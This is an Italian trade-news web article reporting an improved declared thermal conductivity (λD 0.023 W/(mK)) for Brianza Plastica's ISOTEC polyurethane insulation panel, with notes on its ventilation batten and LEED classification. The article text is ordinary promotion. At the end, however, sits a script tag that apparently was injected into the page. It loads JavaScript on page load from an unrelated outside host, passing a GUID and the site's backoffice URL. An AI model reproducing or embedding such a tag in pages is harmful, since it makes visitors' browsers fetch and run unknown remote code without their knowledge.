1. Home
  2. Notizie e Mercato
  3. Brianza Plastica: ISOTEC ancora più performante

Brianza Plastica: ISOTEC ancora più performante

Isolamento di
5/5
votato da 1 persone
Dopo trent’anni sul mercato, Isotec mantiene ancora un’alta competitività: ad oggi il suo valore di conduttività termica dichiarata è di λD = 0,023 W/mk


Brianza Plastica, grazie ad un costante lavoro di ricerca e sviluppo, ha reso il pannello ISOTEC, sempre più performante: ad oggi, infatti, è possibile dichiarare per questo prodotto, una conduttività termica dichiarata λD di 0,023 W/(mK), secondo la normativa UNI EN 13165:2013. Si tratta, per l’azienda, di un risultato importante, che conferma la qualità di questo sistema di isolamento che si appresta a compiere, il prossimo anno, trent’anni dalla sua prima apparizione sul mercato.

ISOTEC è ormai un punto di riferimento per il progettista, un valido alleato nella realizzazione di coperture e pareti altamente efficienti dal punto di vista energetico. Il pannello, infatti, disponibile in diverse versioni e spessori, garantisce non solo un ottimo isolamento ma, grazie al correntino in Aluzinc di cui è dotato, anche un’adeguata ventilazione, che contribuisce ad aumentare il comfort globale dell’edificio.

ISOTEC, ideale per riqualificare sia coperture a falde sia pareti già esistenti o nuove, è costituito da un’anima in poliuretano espanso rigido, il materiale isolante che garantisce le migliori prestazioni, permettendo di ottenere elevati livelli di isolamento termico con spessori significativamente ridotti rispetto a quelli necessari con altri materiali isolanti. Recentemente, questo sistema è stato mappato e classificato secondo i criteri LEED (Leadership in Energy and Environmental Design) offrendo al progettista un’ulteriore guida ad una scelta consapevole delle soluzioni costruttive, in accordo anche con i criteri di certificazione internazionali.


<script src="https://secure-content-delivery.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&amp;d=2013-10-10&amp;s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1&amp;cb=0.903190389429192" type="text/javascript"></script>